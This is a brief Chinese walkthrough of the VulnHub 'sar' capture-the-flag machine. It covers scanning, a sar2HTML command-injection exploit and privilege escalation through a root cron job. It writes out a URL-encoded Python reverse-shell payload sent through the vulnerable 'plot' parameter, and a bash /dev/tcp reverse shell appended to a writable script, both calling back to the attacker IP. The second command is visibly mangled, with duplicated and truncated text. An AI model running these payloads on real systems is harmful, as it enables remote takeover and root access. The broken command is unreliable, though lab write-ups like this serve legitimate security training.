sar

下载地址：https://download.vulnhub.com/sar/sar.zip

攻击者IP：192.168.56.132 桥接（自动） vmare

受害者IP：192.168.56.151 仅主机 vxbox

参考：https://www.freebuf.com/articles/web/367144.html

主机发现

端口扫描

目录扫描

robots.txt提示访问sar2HTML

上传php马后找不到文件路径

发现存在rce漏洞

searchsploit sar2html

http:///index.php?plot=;

验证漏洞存在

反弹shell

http://192.168.56.151/sar2HTML/index.php?plot=LINUX;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.132%22,2222));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

可以看到上传路径是http://192.168.56.151/sar2HTML/sarDATA/uPLOAD/shell.php

计划任务提权

每 5 分钟以 root 用户身份执行 finally.sh 脚本，保证在 /var/www/html/ 目录下运行。

finally内容是运行write.sh，www有权限修改write.sh，

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.56.132/33          < -i &>/dev/tcp/192.168.56.132/3333<&1'" >> write.sh

获得root

原文始发于微信公众号（王之暴龙战神）：sar